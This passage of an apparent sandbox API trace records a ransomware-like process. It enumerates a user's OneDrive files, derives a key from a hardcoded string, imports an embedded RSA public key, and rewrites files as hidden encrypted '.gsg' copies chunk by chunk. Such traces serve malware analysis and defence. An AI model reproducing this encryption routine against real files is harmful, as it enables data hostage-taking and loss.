lpBuffer=0x2b9cd24*, lpNumberOfBytesWritten=0x2b9cd1c*=0x5ec, lpOverlapped=0x0) returned 1 [0280.737] FindNextFileA (in: hFindFile=0x2fa488, lpFindFileData=0x2b9e2f0 | out: lpFindFileData=0x2b9e2f0) returned 1 [0280.737] FindFirstFileA (in: lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mi-nz\\*.*", lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 0x2fa4c8 [0280.737] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0280.737] FindNextFileA (in: hFindFile=0x2fa4c8, lpFindFileData=0x2b9df54 | out: lpFindFileData=0x2b9df54) returned 1 [0280.737] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9de64 | out: lpSystemTimeAsFileTime=0x2b9de64) [0280.737] GetLastError () returned 0x0 [0280.737] GetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mi-nz\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mi-nz\\filesync.localizedresources.dll.mui")) returned 0x20 [0280.738] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mi-nz\\FileSync.LocalizedResources.dll.mui", dwFileAttributes=0x80) returned 1 [0280.738] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mi-nz\\FileSync.LocalizedResources.dll.mui" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mi-nz\\filesync.localizedresources.dll.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d4c [0280.739] CreateFileA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mi-nz\\FileSync.LocalizedResources.dll.mui.gsg" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\mi-nz\\filesync.localizedresources.dll.mui.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5d68 [0280.741] SetFileAttributesA (lpFileName="C:\\\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\mi-nz\\FileSync.LocalizedResources.dll.mui.gsg", dwFileAttributes=0x2) returned 1 [0280.741] CryptAcquireContextA (in: phProv=0x2b9ce60, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9ce60*=0x2f1eee8) returned 1 [0280.745] CryptCreateHash (in: hProv=0x2f1eee8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9ce64 | out: phHash=0x2b9ce64) returned 1 [0280.745] lstrlenA (lpString="OJqEEUaHrEmqTOCUsZRXkTNKzMlQm") returned 29 [0280.745] CryptHashData (hHash=0x2fa6c8, pbData=0x28cb350, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0280.745] CryptDeriveKey (in: hProv=0x2f1eee8, Algid=0x6610, hBaseData=0x2fa6c8, dwFlags=0x1000000, phKey=0x2b9ce50 | out: phKey=0x2b9ce50*=0x2fc688) returned 1 [0280.745] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9ce6c, pcbBinary=0x2b9ce4c, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0280.745] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9ce6c, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48 | out: pvStructInfo=0x2b9ce40, pcbStructInfo=0x2b9ce48) returned 1 [0280.745] CryptAcquireContextA (in: phProv=0x2b9ce5c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9ce5c*=0x2f1e778) returned 1 [0280.746] CryptImportPublicKeyInfo (in: hCryptProv=0x2f1e778, dwCertEncodingType=0x1, pInfo=0x2f37570*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x2f375a0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x2f375a8*, PublicKey.cUnusedBits=0x0), phKey=0x2b9ce54 | out: phKey=0x2b9ce54*=0x2fc2c8) returned 1 [0280.746] CryptEncrypt (in: hKey=0x2fc2c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9ce44*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9ce44*=0x80) returned 1 [0280.746] CryptEncrypt (in: hKey=0x2fc2c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f1e888*, pdwDataLen=0x2b9ce58*=0x18, dwBufLen=0x80 | out: pbData=0x2f1e888*, pdwDataLen=0x2b9ce58*=0x80) returned 1 [0280.746] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f1e888*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f1e888*, lpNumberOfBytesWritten=0x2b9ce68*=0x80, lpOverlapped=0x0) returned 1 [0280.747] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.794] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.794] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.833] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.836] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.836] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.836] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.836] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.836] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.837] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.837] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.837] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.837] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.837] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.837] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.837] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.838] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.838] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.838] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.838] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.838] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.838] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.838] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.838] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.838] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.838] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.838] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.839] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.839] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.839] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.839] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.839] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.839] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.840] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.840] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.840] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.840] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.840] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.840] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.840] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.840] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.840] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.841] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.841] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.841] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.841] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.841] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.841] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.842] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.842] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.842] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.842] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.842] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.842] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.842] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.842] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.842] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.844] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.844] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.844] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.844] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.844] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.844] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.844] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.845] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.845] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.845] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.845] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.845] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.845] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.845] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.845] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.845] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.846] CryptEncrypt (in: hKey=0x2fc688, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x2f5f1f0*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0280.846] WriteFile (in: hFile=0x5d68, lpBuffer=0x2f5f1f0*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0280.846] ReadFile (in: hFile=0x5d4c, lpBuffer=0x2f5f1f0, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x2f5f1f0*, 